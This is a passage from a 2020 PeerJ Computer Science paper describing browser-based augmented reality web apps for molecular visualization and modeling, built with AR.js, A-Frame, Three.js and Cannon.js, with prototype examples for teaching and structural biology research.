keyboard, thus enabling more intuitive, fluid exploration of molecular features and data. At the time of writing, most of these works are not complete AR or VR versions of fully-fledged programs, but rather prototypes, proofs of concept and case studies on how humans interact with virtual molecules in AR or VR. Notable highlights moving towards complete immersive molecular visualization and modeling programs are the new rewrite of Chimera, ChimeraX, which was optimized for the new GPUs and incorporates support for VR experiences (Goddard et al., 2018b), VRmol (Xu et al., 2019), new VR plugins for the VMD molecular graphics program (Stone, 2019), and a few commercial programs like Autodesk’s Molecule Viewer (https://autodeskresearch.com/groups/lifesciences) or Nanome (https://nanome.ai/), all with interfaces specifically tailored for VR. Most of these works suffer from two severe limitations. First, all but a few exceptions require hardware such as head-mount displays (helmets, headsets or goggles like MS Hololens, Oculus Rift, HTC Vibe, etc.) or immersive installations with large surround screens plus 3D-handheld input devices and the corresponding computer and GPU hardware. The few remarkable exceptions are prototypes using ordinary webcam-enabled smartphones (Balo, Wang & Ernst, 2017) or laptops (Gillet et al., 2004). The second limitation is the need of specialized programs that often must be correctly interfaced to couple the different components required for an AR or VR experience, that is, tracking limbs, handheld devices or AR markers, then running calculations on molecular data, and finally displaying results and molecular graphics on screen (see Ratamero et al., 2018; Gillet et al., 2005). Some of these programs are only compatible with specific VR devices and many are not free software. Overall, then, despite the dropping costs, access to these tools still requires investment in the order of hundreds to low-thousand American dollars per Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 2/23 https://autodeskresearch.com/groups/lifesciences https://nanome.ai/ http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ user, and software interfacing that may not be available to lay students and teachers. It is therefore unlikely that VR will achieve the ideal of one device per student within the next few years. To date, these solutions are not widely used across the world, and their costs make them totally out of reach for educational centers in developing countries. Additionally, most current setups are limited to VR, but it has been shown that AR is more suited for educational purposes because by not occluding the view of the user’s own limbs, it results in better motion coordination and object handling than VR (Sekhavat & Zarei, 2016; Gaffary et al., 2017; Krichenbauer et al., 2018). Furthermore, in AR the view of the world is not obstructed thus allowing students and teachers to interact more easily. The purpose of this work is to demonstrate that client-side web technologies have matured enough to enable web pages for AR-based molecular visualization and modeling running just on web browsers in regular webcam-equipped computers. This enables the easy creation of immersive educational material that can be employed by students and teachers at very affordable costs and with very simple setups. All they must do is access a webpage, enable webcam activity in the browser, and show to the webcam a printed AR marker on which the molecules will be displayed. From the developer side, the code is made simple thanks to a large number of libraries; in fact visualization-only applications are achievable just with HTML code while interactivity can be incorporated through custom JavaScript. This article is organized in two parts. Part 1 provides a practical overview of the main building blocks available as of 2019 to program AR apps in web pages, with a focus on ways to achieve molecular visualization and modeling. It also briefly explores ways to handle gesture- and speech-based commands, molecular mechanics, calculation of experimental observables, concurrent collaboration through the world wide web, and other human- computer interaction technologies available in web browsers. Part 2 of the article showcases prototype web apps for specific tasks of practical utility in pedagogical and research settings. These web apps are based on open, commodity technology that requires only a modern browser “out of the box”, so educators, students and researchers are free to try out all these examples on their computers right away by following the provided links. PART 1: OVERVIEW OF BUILDING BLOCKS FOR IMMERSIVE MOLECULAR MODELING IN WEB BROWSERS Virtual and augmented reality At the core of immersive experiences are visualizations based on VR or AR methods. While VR is probably best experienced with VR goggles to suppress any side view of the real world, AR is more amenable to devices like desktop or laptop computers, tablets and smartphones, making it better suited for commodity solutions, and has the additional advantages outlined in the introduction. The methods presented in this article make use of marker-based AR in a web-based setup that functions as an “AR mirror” where the user sees him/herself with the virtual objects, here molecules, overlaid on the markers he/she holds in their hands (Figs. 1A and 1B). The following descriptions focus on this technology and how it can be implemented in web apps by using HTML, CSS and Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 3/23 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ JavaScript code as standard web pages that are hosted at servers but run entirely on local computers (Fig. 1C). The WebGL API provides powerful 2D and 3D graphing capabilities using GPU resources, in a format fully integrable with other HTML elements, APIs and JavaScript libraries, without the need of plug-ins; and is highly standardized across browsers. It is thus possible to couple all elements required to build up an AR experience directly inside the web page source code. A handful of JavaScript libraries exploit WebGL to facilitate rendering of 3D scenes, Three.js (https://threejs.org/) being probably the most widely used. In turn, tools like A-Frame (https://aframe.io/) provide entity component system frameworks that wrap Three.js into HTML language tags through polyfills, greatly facilitating the development of AR and VR scenes. The examples presented in Part 2 showcase either direct use of Three.js or of Three.js through A-Frame for AR. These libraries/frameworks can be used either by (i) loading pre-made models of the molecular Figure 1 Commodity augmented reality in web browsers. (A) AR markers “Hiro” and “Kanji” are built into AR.js and its A-Frame wrap. Figure S1 shows them ready to print at various sizes. Custom markers including cube markers are also implementable. (B) In the proposed web apps the AR library feeds coordinate information to the graphics libraries and other algorithms. (C) The web pages must be hosted in servers compatible with the https protocol, but their content then runs exclusively on the computer. Full-size DOI: 10.7717/peerj-cs.260/fig-1 Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 4/23 https://threejs.org/ https://aframe.io/ http://dx.doi.org/10.7717/peerj-cs.260/supp-1 http://dx.doi.org/10.7717/peerj-cs.260/fig-1 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ systems in formats like Wavefront’s OBJ+MTL files exported straight out of molecular visualization programs like VMD (Humphrey, Dalke & Schulten, 1996), UnityMol (Doutreligne et al., 2014; Wiebrands et al., 2018), ChimeraX (Goddard et al., 2018b), etc., possibly further edited with a program like Blender as in Martínez-Hung, García-López & Escalona-Arranz (2016); or (ii) employing 3D primitives (like spheres, cylinders, etc.) to draw the molecular systems from scratch with their atomic coordinates. Use of Wavefront models is much simpler (only a few lines of HTML code to load and display objects) and allows seamless display of any element exported from molecular graphics programs, including not only different representations of molecules but also isosurfaces as those needed to visualize volumetric data describing molecular orbitals, electron microscopy maps, etc. On the other hand, using 3D primitives requires larger pieces of code to create all 3D objects from atomic coordinates, but in turn allows for fine dynamic control of shapes, sizes, colors, and positions, which are key to interactivity. Another downside of Wavefront models is that files can become quite large for high-resolution textures. Object detection and tracking The other key component required for AR and VR is a means to detect and track objects or parts of the user’s body such as his/her hands, in order to manipulate virtual objects. Applications using ad hoc hardware use sensors and cameras that track the user’s position in space and handheld controllers that the user sees as virtual tweezers or hands, to directly move objects in space. For commodity AR/VR in web browsers, solutions rely on JavaScript versions of tracking libraries that implement computer vision algorithms through the webcam feed, like ARToolKit (Kato, 1999) among other similar solutions. These libraries track user-defined 2D markers (like those in Fig. 1A; Figs. S1 and S2) in space and make their computed coordinates available to the graphics algorithms. Two especially interesting libraries, used in many of the examples presented in Part 2, are AR.js (https://github.com/jeromeetienne/AR.js) and its A-Frame wrap (https://jeromeetienne. github.io/AR.js/aframe/). These enable highly simplified AR/VR, even using exclusively HTML code for simple developments. It is important to note that in marker-based AR different viewers looking at the same physical marker receive different perspectives of it and hence of the rendered virtual object, just as if it was a real object in real space (Fig. S3). This easily enables multi-user AR in a common room, as would be useful in a classroom setting where students and teachers look at the same virtual molecule. An alternative to traditional marker-based AR should in principle be possible by using a plain hand tracking JavaScript library like Handtracking.js. Another slightly more expensive approach but possibly better in tracking performance is using a device like the infrared-based Leap Motion Controller (https://www.leapmotion.com/), which includes a JavaScript library to feed positional information from the device into the web app. Unfortunately, however, there are currently no ready-to-use libraries that couple these input tools to WebGL graphics, so their use would require further developments. Current JavaScript libraries for computer vision allow even more complex object tracking. One interesting example is gesture recognition by the WebGazer.js library, which Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 5/23 http://dx.doi.org/10.7717/peerj-cs.260/supp-1 http://dx.doi.org/10.7717/peerj-cs.260/supp-1 https://github.com/jeromeetienne/AR.js https://jeromeetienne.github.io/AR.js/aframe/ https://jeromeetienne.github.io/AR.js/aframe/ http://dx.doi.org/10.7717/peerj-cs.260/supp-1 https://www.leapmotion.com/ http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ analyzes face features to estimate where on the screen the user is looking at (Papoutsaki et al., 2016). In molecular visualization, this can be used for example to automatically rotate regions of interest to the front of the field of view, as shown in Fig. S4. Speech-based interfaces A speech-based interface can be very useful for situations in which the user’s hands are busy holding objects, as in AR/VR applications. In-browser speech recognition APIs enable implementation of speech recognition very easily, especially through libraries like Annyang (Ater, 2019) which is used in some of the examples of this article. These libraries usually allow working in two modes, one where the browser waits for specific commands (while accepting variable arguments) and one where the browser collects large amounts of free text that are then made available to the environment. The former allows direct activation of functions without the need for the user to click on the screen. The second option opens up the possibility of automatically detecting subjects, actions and concepts that are fed to artificial intelligence routines, or just predefined rules, that the computer will analyze in background. For example, when two users are discussing the interaction surface between two proteins and mention certain residues, the computer could automatically mine NIH’s PubMed repository of papers for mentions of said residues. This may seem far-fetched, but is essentially the same technology that underlies automatic advertising and suggestions based on users’ various inputs and usage statistics in software and websites. The problem of intelligently suggesting chemical and biological information related to a topic or object has already been addressed for some time, for example in information augmentation tools like Reflect (Pafilis et al., 2009) and advanced text-mining tools (Rebholz-Schuhmann, Oellrich & Hoehndorf, 2012). The evolution of science-related standards are very important in this regard, formats and content for the semantic web (Hendler, 2003) and of machine-readable scientific databases and ontologies that standardize knowledge and data. Intensive calculations As recently reviewed in a dedicated issue of Computing and Science in Engineering (DiPierro, 2018), JavaScript has become very powerful by including language subsets specialized for speed, optimized just-in-time compilation, methods to program background scripts, and libraries to perform multi-core and on-GPUs computing to accelerate intensive calculations. It is in fact now possible to transpile from C/C++ and other languages directly to JavaScript retaining close-to-native execution speeds, allowing web browsers to support quite complex data analysis and visualization directly in web pages (Abriata et al., 2017; Abriata, 2017a). This opens up the possibility of simulating molecular mechanics and experimental data, performing numerical data analysis and even handling data in neural networks, directly inside the molecular modeling web app to enable real-time feedback as the user manipulates the molecular systems. Some of the prototypes presented in Part 2 include such examples. Rather than manually implementing calculations, a number of libraries are now available for specific applications that help to save code writing time and bring the Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 6/23 http://dx.doi.org/10.7717/peerj-cs.260/supp-1 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ additional advantage of being developed by specialists (Abriata, 2017a). One particularly useful library in the scope of this paper is Cannon.js (https://schteppe.github.io/cannon.js/), an engine for simulating rigid body mechanics that integrates smoothly with Three.js and A-Frame. These engines use numerical methods to propagate motions of solid bodies connected by springs and other physical constraints in an approximate but efficient way, thus adding realistic physics to the 3D bodies of AR and VR worlds. Although these engines do not account for all the forces and phenomena of the atomic realm, such as electrostatic interactions and quantum phenomena, they are useful in certain real scenarios of molecular modeling. For example, the Integrative Modeling Platform software (used to put together partial structures into bigger assemblies, driven by experimental data) includes one such kind of physics engine for molecule-molecule docking (Russel et al., 2012). Furthermore, implementation of more complex force fields is certainly possible, as exemplified by a JavaScript transpilation of the OpenMD molecular dynamics engine (Jiang & Jin, 2017). Further building blocks Any other technology that facilitates interaction with the computer within a 3D environment, either to deliver or obtain information, might be of use. For example, haptic feedback would be desirable to confer a physical feel of interactions and clashes as in (Wollacott & Merz, 2007; Stocks, Hayward & Laycock, 2009; Stocks, Laycock & Hayward, 2011; Matthews et al., 2019). Achieving a good experience in haptic feedback currently requires specialized devices, and is an area of active research (Bolopion et al., 2009, 2010), therefore it does not fit with the commodity hardware criteria outlined in the introduction. Other rudimentary ways to achieve sensory feedback include exploiting built-in vibration devices and touch-pressure sensing in touch screens, both handled by JavaScript APIs. Finally, a particularly interesting aspect of software running on web browsers is the ease with which different users can connect to each other, just over the internet. Web apps can exploit web sockets to achieve direct browser-to-browser links over which data can be transmitted freely, with a server only intervening to establish the initial connection (Pimentel & Nickerson, 2012). For example, two or more users can concurrently work on a JSmol session by sharing just mouse rotations and commands, appearing on all other users’ screens with a minor delay (Abriata, 2017b). Such collaborative working technology could be adapted to complex immersive environments to allow multiple users to work on chemical problems at a distance, essential for scientific collaborations, demonstrations, and online teaching (Lee, Kim & Kang, 2012). PART 2: PROTOTYPE WEB APPS SHOWCASING EXAMPLE APPLICATIONS This section presents example AR web apps compatible with major web browsers in modern computers, introducing features of increasing complexity. All examples were verified to run out of the box in multiple web browsers on Windows, Linux and MacOS operating systems, in laptop and desktop computers. All the examples are accessible through links in Table 1 and at https://lucianoabriata.altervista.org/papersdata/tablepeerjcs2019.html, which Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 7/23 https://schteppe.github.io/cannon.js/ https://lucianoabriata.altervista.org/papersdata/tablepeerjcs2019.html http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ further contains links to demo videos. To run these examples the user needs to print the Hiro, Kanji or cube markers as needed in each case (Fig. 1A; Figs. S1 and S2, and links on web pages). For simpler handling, flat markers (Hiro and Kanji) may be glued on a flat surface mounted on a device that can be easily rotated from the back, such as a small shaft perpendicular to the marker plane. The cube marker is printed in a single page, folded and possibly glued to a solid cube made of wood, plastic, rubber or similar material. Readers interested in the inner workings and in developing content can inspect the source code of each webpage (Ctrl+U or Cmd+U in most browsers). Several recommendations and basic troubleshooting for developers and users are given in Table 2. Introducing web browser-based AR for visualization The simplest way to achieve AR in web pages consists in displaying on the AR markers representations exported from programs like VMD (Humphrey, Dalke & Schulten, 1996) in Wavefront (OBJ+MTL) format. This can be achieved with a few lines of HTML code thanks to libraries like AR.js for A-Frame, enabling the very easy creation of content for displaying any kind of object handled by the exporting program. Figure 2A exemplifies this with a small molecule, 2-bromo-butane, shown as balls and sticks. This small molecule is chiral at carbon 2; the Hiro marker displays its R enantiomer while the Kanji marker displays the S enantiomer, both rendered from the same pair of OBJ+MTL files but scaled as required for chirality inversion. Figure 2B shows on the Hiro marker a protein Table 1 Links to all web examples arranged by figure. See https://lucianoabriata.altervista.org/papersdata/tablepeerjcs2019.html for an online version of the table which also includes links to several video demonstrations. Figure 2 2A https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/2brbutane.html 2B and 2C https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/pdb-1vyq-1fjl.html 2D https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bacteriophage.html 2E https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/xray3hyd.html 2F https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bh3nh3orb.html 2G https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinandNESatomistic.html 2H https://lucianoabriata.altervista.org/jsinscience/arjs/jsartoolkit5/pdbloader6.html Figure 3 3A https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolclashdetection.html and https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolprotontransfer.html 3B https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmoldielsalder.html 3C https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/metmyoglobinfe3pcshift.html Figure 4 4A https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinuimffvoicesaxs.html 4B https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/coevol_1qop.html Figure 5 5A–5C https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitin-uim-cannon.html Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 8/23 http://dx.doi.org/10.7717/peerj-cs.260/supp-1 http://dx.doi.org/10.7717/peerj-cs.260/supp-1 https://lucianoabriata.altervista.org/papersdata/tablepeerjcs2019.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/2brbutane.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/pdb-1vyq-1fjl.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bacteriophage.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/xray3hyd.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/bh3nh3orb.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinandNESatomistic.html https://lucianoabriata.altervista.org/jsinscience/arjs/jsartoolkit5/pdbloader6.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolclashdetection.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmolprotontransfer.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/smallmoldielsalder.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/metmyoglobinfe3pcshift.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitinuimffvoicesaxs.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/coevol_1qop.html https://lucianoabriata.altervista.org/jsinscience/arjs/armodeling/ubiquitin-uim-cannon.html http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ complex rendered as cartoons with small molecule ligands rendered as sticks (PDB ID 1VYQ, same example used by Berry & Board (2014)); and Fig. 3 shows a cartoon representation of a protein bound to a short segment of double stranded DNA rendered as sticks (from PDB ID 1FJL) spinning on the Kanji marker. Figure 2D exemplifies display of VMD isosurfaces to show a volumetric map of a bacteriophage attached to its host as determined through electron microscopy (EMDB ID 9010). Two further examples feature combined representations of atomic structure and volumetric data: Fig. 2E shows a small peptide rendered as sticks and docked inside the experimental electron map shown as a mesh (from PDB ID 3HYD), and Fig. 2F shows the frontier molecular orbitals of BH3 and NH3 (from Wavefront files kindly provided by G. Frattini and Prof. D. Moreno, IQUIR, Argentina). The next level of complexity is building up scenes from 3D primitives, which brings the advantage over ready-made models that all the elements can be handled independently, thus allowing the possibility of incorporating interactivity. This can be achieved either through A-Frame with AR.js, thus requiring only HTML code for display as in the Wavefront-based examples above, or through libraries that require additional JavaScript code but in turn enable more complex functionalities. Exemplifying the former case, Table 2 Requirements and troubleshooting for developers and users. Developers Software and hardware requirements * Ensure using https URLs; otherwise webcams will not activate. * Free web hosting services work, as web pages only need to be hosted but run in the client. * Given the regular updates in w3c standards, APIs and libraries, routine tests are recommended to ensure normal functioning. * Examples from this paper were verified to work “out of the box” on Safari in multiple MacOS 10.x versions and on multiple Chrome and Firefox versions in Windows 8, Windows 10, Linux RedHat Enterprise Edition, Ubuntu and ArchLinux. * Currently limited and heterogeneous support in tablets and smartphones, these devices are not recommended. Users Software and hardware requirements * Need a webcam- and internet-enabled computer (desktop or laptop). * Enable webcam when prompted. * JavaScript and WebGL must be enabled in the browser (that is a default setting). * Check that ad blockers and firewalls do not block the webcam and other content. * Pages containing large Wavefront files may take time to load (half to a few minutes). Augmented reality markers * Print on regular printer; try different sizes for different applications. * When using Hiro and Kanji markers ensure they are printed at the same size. * Ensure that makers have a white frame around the black drawing, at least 10% of size. * To improve marker recognition, avoid glossy papers. Opaque paper is best. * Lighting may also affect the quality of the AR experience. * Markers are easier to handle if glued on solid surfaces (but avoid wrinkles). * Cubic marker can be glued on solid rubber cube cut to appropriate size. Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 9/23 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ Fig. 2G uses A-Frame spheres and cylinders placed at coordinates computed from atomic positions, colored by atom type and assigned atom-specific radii, to render a model of a small protein helix on the Kanji marker. The latter case of using pure JavaScript is Figure 2 Different implementations of WebGL for AR in web browsers. (A) 2-bromo-butane enantiomers R and S displayed on Hiro and Kanji markers, respectively, from Wavefront objects pro- duced in VMD. (B) A protein complex rendered as cartoons with small molecule ligands shown as sticks on the Hiro marker (PDB ID 1VYQ). (C) A double-stranded segment of DNA (sticks) bound to a homeodomain protein (cartoon) spinning on the Kanji marker (PDB ID 1FJL). Both B and C were rendered from VMD Wavefront objects. (D) Volumetric map of a bacteriophage attached to a portion of the host’s cell wall as determined through electron microscopy (EMDB ID 9010) and prepared as VMD Wavefront object showing the capsid in gray, the needle in blue and the membranes in orange. (E) A small peptide inside its electron density map as determined by X-ray diffraction (PDB ID 3HYD). (F) HOMO and LUMO orbitals from NH3 and BH3 molecules, rendered from Wavefront objects. (G) Representation of an amphipathic alpha helix built from primitives, viewable on the Kanji marker. (H) Use of a cube marker (made up of six different AR markers in its faces) to load any molecule in PDB format and handle and visualize it in 3D. Graphics built from Three.js primitives. The example also uses Cannon.js to simulate rigid body dynamics by fixing the distances between atoms separated by one or two bonds but allowing rotations, in analogy to plastic-made molecular modeling kits. Full-size DOI: 10.7717/peerj-cs.260/fig-2 Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 10/23 http://dx.doi.org/10.7717/peerj-cs.260/fig-2 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ illustrated by the jsartoolkit library (https://github.com/artoolkit/jsartoolkit5), in an example where six markers arranged on the faces of a cube are coupled to drive a single object in full 3D. Lastly, combining this with direct use of Three.js to draw 3D primitives, the web app in Fig. 2H allows visualization and manipulation of any molecule loaded in PDB format in full 3D, in this case (D)-glucopyranose. Adding interactivity: examples on small molecules Web apps using A-Frame can gain interactivity through portions of JavaScript code that read atom coordinates and carry out calculations on them. Figure 3 shows another series of examples of increasing complexity, focusing on small molecules. In Fig. 3A, the user drives a lysine side chain with the Hiro marker and a glutamate side chain with the Kanji marker. Each molecule is anchored to the center of its corresponding AR marker through its alpha carbon atom. Their protonation states correspond to neutral pH, so lysine is protonated hence its N atom (blue) is charged by +1, whereas glutamate is deprotonated hence its O atoms (red) bear a total charge of −1. Through simple JavaScript code the web app (i) represents with yellow dots the vector connecting the lysine’s N atom and one of the glutamate’s O atoms; (ii) reports the distance between these atoms and the corresponding attractive electrostatic force in real time; and (iii) checks for and displays clashes between any pair of atoms of the two molecules. The code for (i) is wrapped inside Figure 3 Introducing interactivity. (A) A lysine and a glutamate side chain attached to different AR markers, whose coordinates are processed in real time to deliver distance and electrostatic potential between charged groups and to calculate and display clashes. Graphics achieved with A-Frame polyfills. In this example the ratio of protonated lysine to glutamate exchanging dynamically is set to 70/30 = 2.33, that is, favoring protonated lysine as the actual water chemistry dictates but shifted orders of magnitude from the real ratio of acidic constants so that the user can observe temporal protonation of both amino acids in the timescale of work. (B) A Diels-Alder reaction, taking place once the user has moved the reagents close enough in space; this example further helps to visualize fused cycles (as the diene reagent was a cyclic molecule itself). (C) Example of interactively probing experimental observables: as a probe atom (black sphere) is moved around a paramagnetic center, the user sees the paramagnetic effects simulated at the location of the probe atom in real time. Full-size DOI: 10.7717/peerj-cs.260/fig-3 Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 11/23 https://github.com/artoolkit/jsartoolkit5 http://dx.doi.org/10.7717/peerj-cs.260/fig-3 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ an auxiliary .js file, and the code for (ii) and (iii) is located between <script> tags at the end of the HTML file. The distance, electrostatic and clash calculations are computed inside a setInterval() function every 200 ms, and use the id attribute of the sphere tags to locate the atomic coordinates. The distance calculation includes a correction for a zoom factor that scales atom sizes and positions when the molecular coordinates are parsed into A-Frame HTML to properly fit the screen. Clashes are detected when two spheres are within 3 Å and displayed as semitransparent A-Frame spheres centered on the affected atoms. A modified version of this example is also provided, incorporating a very simplistic emulation of hydrogen bond detection and proton transfer (second link for Fig. 3A in Table 1). JavaScript code calculates and displays hydrogen bonds when the geometry permits, and randomly “transfers” one proton from lysine’s N atom to one of the O atoms of glutamate if the lysine is protonated, or the other way around (actually spheres attached to each marker are hidden or shown as needed to emulate proton transfer). Protons “jump” only when they are within 2 Å of the receiving N or O atom; and they are set to jump back and forth to reflect 70% time-averaged population of protonated lysine and 30% of protonated glutamate, to convey the feeling of different acidic constants (10−pKa) favoring protonation of the base. When 2 Å < N–O distance < 3 Å the web app displays a yellow dotted line that represents a hydrogen bond between the potential receiver heavy atom and the involved proton. Similar emulation strategies could be easily used to build “interactive animations” for exploring chemical and physical phenomena of much pedagogical use, as in the PhET interactive simulations (Moore et al., 2014) but using AR to directly, almost tangibly, handle molecules. For example, the app shown in Fig. 3B illustrates stereoselectivity in the Diels-Alder reaction in interactive 3D. This reaction occurs between a dienophile and a conjugated diene in a concerted fashion, such that the side of the diene where the initial approach occurs defines the stereochemistry of the product. The web app in this example allows users to visualize this in 3D as they approach a molecule of 1,3-cyclohexadiene on the Hiro marker to a molecule of chloroethene on the Kanji marker. As the two pairs of reacting C atoms approach each other, the new bonds gain opacity until the product is formed. Additionally, the product formed in this reaction is by itself an interesting molecule to visualize and manipulate in AR, because it contains two fused six-membered rings which are hard to understand in 2D. It should be noted that the examples provided here emulating reactivity are merely pictorial visualizations of the mechanisms, and not based on any kind of quantum calculations. Such calculations are too slow to be incorporated into immersive experiences where energies need to be computed on the fly. However, novel machine learning methods that approximate quantum calculations through orders-of-magnitude faster computations (Smith, Isayev & Roitberg, 2017; Bartók et al., 2017; Paruzzo et al., 2018) could in the near future be coupled to AR/VR systems to interactively explore reactivity in real time. Obviously, such tools could be useful not only in education but also in research, for example to interactively test the effect of chemical substituents on a reaction, estimate effects on spectroscopic observables, probe effects of structural changes on Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 12/23 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ molecular orbitals, etc. It is already possible to integrate AR/VR with a physics engine, to add realistic mechanics to the simulation. The web app in Fig. 2H uses Cannon.js to simulate thermal motions and thus give a sense of dynamics to the visualized system. In this web app, Cannon.js handles the multi-atom system by treating atoms as spheres of defined radii connected by fixed-distance constraints and whose velocities are continuously updated to match the set temperature, leading to rotations around bonds. However, extension of Cannon.js to include additional force field terms like dihedral angle terms and electrostatic interactions would be needed to achieve a more complete and realistic modeling experience. AR-based modeling of biological macromolecules Figures 2 and 3 already include examples for visualizing certain biological macromolecules, and the previous section introduced ways to incorporate interactivity into these web apps. This section digs deeper into the development of interactive content more relevant to education and research in structural biology, by exploring the incorporation of restraints, simple force fields and on-the-fly simulation of experimental observables for biological macromolecules. The example in Fig. 3C uses JavaScript to calculate paramagnetic effects on the nuclear magnetic resonance signal of a probe atom (black) attached to the Kanji AR marker, as it is moved around the heme group of metmyoglobin attached to the Hiro AR marker. By applying standard equations (Bertini, Turano & Vila, 1993) on the atomic coordinates, this web app simulates the dipolar effects of the paramagnetic iron ion on the probe atom and displays the resulting contribution to the NMR spectrum using the Google Charts JavaScript library (https://developers.google.com/chart). The web app shown in Fig. 4A allows exploration of the interaction space of two proteins that are known to form a complex in solution, specifically ubiquitin (red trace) and a ubiquitin-interacting motif (UIM, blue trace) taken from PDB ID 2D3G (Hirano et al., 2006). The web app simulates on-the-fly the small-angle X-ray scattering (SAXS) profiles expected from the relative arrangement of the two proteins, and displays them overlaid onto an experimental profile in real time as the user moves the proteins. This offers a way to interactively test compatibility of possible docking poses with the experimental data. Although it cannot compete with the extensive sampling achievable with molecular simulations, such an interactive tool could be useful for preliminary analysis of SAXS data before starting complex calculations or to assist interpretation of the results of such calculations. For simplicity and speed, in this example the SAXS profile calculation is based on the Debye formula iterated through pairs of residues instead of through all pairs of atoms as the full equation requires (Debye, 1915); however, realistic SAXS profiles of actual utility in modeling can be achieved with coarse graining strategies and proper parameterization of the scattering centers (Stovgaard et al., 2010). This web app further includes a rudimentary residue-grained force field (i.e., describing each amino acid with one backbone and one side chain bead) to detect clashes, and a predefined binding coordinate which upon activation brings the two molecules together. Activation of SAXS profile simulation, clash-detecting force field and binding coordinate are controlled Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 13/23 https://developers.google.com/chart http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ by voice commands, required because the user’s hands are busy handing the markers. This proceeds through the browser’s cloud-based speech recognition API so does not consume much resources. The successful combination of all these different elements (AR, 3D visualization, calculations, and speech recognition) illustrates the superb integration capability of libraries for client-side scripting in web browsers. The modularity and simplicity of client-side web programming allows easy adaptation to other kinds of experimental data; for example to residue-specific paramagnetic relaxation enhancements as done by Prof. Rasia (IBR-CONICET-UNR, Argentina) at https://rrasia.altervista.org/ HYL1_1-2/Hyl1_12_minima.html. Another example, presented in Fig. 4B shows how AR can help to explore residue- residue contact predictions from residue coevolution data. Such predictions provide useful restraints in modern approaches for modeling proteins and their complexes (Simkovic et al., 2017; Abriata et al., 2018; Abriata, Tamò & Dal Peraro, 2019), but often include a fraction of false positives that introduce incorrect information if undetected. Interactive inspection of residue-residue contact predictions could help to actively detect false positives through human intervention before the actual restraint-guided modeling proceeds. The example in Fig. 4B shows contacts predicted from coevolution analysis of large sequence alignments for the pair of proteins in chains A and B of PDB ID 1QOP, taken from the Gremlin server (Ovchinnikov, Kamisetty & Baker, 2014). Each protein is driven by one marker, and the predicted contacts are overlaid as dotted lines connecting the intervening pairs of residues. These lines are colored green, olive and red according to decreasing coevolution score as in the Gremlin website, and their widths reflect in real Figure 4 Interactivity in biological macromolecules. (A) Ubiquitin and ubiquitin-interacting motif (red and blue respectively, taken from PDB ID 2D3G) driven in 3D with two AR markers, as the web app computes the predicted SAXS profile and displays it overlaid on top of a purported experimental profile together with a metric of the fit quality. (B) Interactive exploration of contacts predicted between two proteins (here from coevolution data) before and after manual docking. This example is 1QOP from Ovchinnikov et al., where contacts predicted with high score are colored green, contacts of intermediate confidence are olive, and the first contact of low probability is shown red (as taken from the original data). The thickness of the contact lines indicates distance, such that thin lines indicate the residues are close in space. Notice how the red contact, which has low probability, remains thicker than the well-scored contacts (green) upon manual docking. Full-size DOI: 10.7717/peerj-cs.260/fig-4 Abriata (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.260 14/23 https://rrasia.altervista.org/HYL1_1-2/Hyl1_12_minima.html https://rrasia.altervista.org/HYL1_1-2/Hyl1_12_minima.html http://dx.doi.org/10.7717/peerj-cs.260/fig-4 http://dx.doi.org/10.7717/peerj-cs.260 https://peerj.com/computer-science/ time the distance between pairs of residues, presumably minimal when contacts are satisfied if the prediction is true. The last prototype application shows rudimentary handling of highly disordered protein regions, in this case to test how a flexible linker made of six glycine residues restricts the space available for exploration and possible docking poses of two well-folded domains 